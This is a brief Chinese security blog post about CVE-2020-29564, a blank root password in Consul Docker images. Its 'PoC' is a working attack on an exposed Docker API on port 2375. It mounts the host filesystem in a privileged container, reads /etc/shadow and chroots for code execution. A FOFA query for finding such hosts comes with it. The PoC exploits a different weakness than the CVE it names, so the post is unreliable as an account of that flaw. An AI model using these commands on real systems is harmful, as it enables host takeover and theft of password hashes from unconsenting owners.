CVE-2020-29564 Consul Docker images 空密码登录漏洞

# CVE-2020-29564 Consul Docker images 空密码登录漏洞

Consul Docker images 0.7.1至1.4.2版本部署的Consul Docker容器的系统,可能允许远程攻击者使用空白密码来实现root用户访问。

**PoC:**

“`bash
docker -H :2375 run –rm -it –privileged –net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt
“`

FOFA:

“`
port=”2375″ && protocol==”docker”
“`

![](/static/lingjiao/media/16096802412075/16096802747315.jpg)

![](/static/lingjiao/media/16096802412075/16096802834542.jpg)

**ref:**

* https://forum.ywhack.com/thread-114824-1-2.html
* https://github.com/koharin/koharin2/blob/main/CVE-2020-29564

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容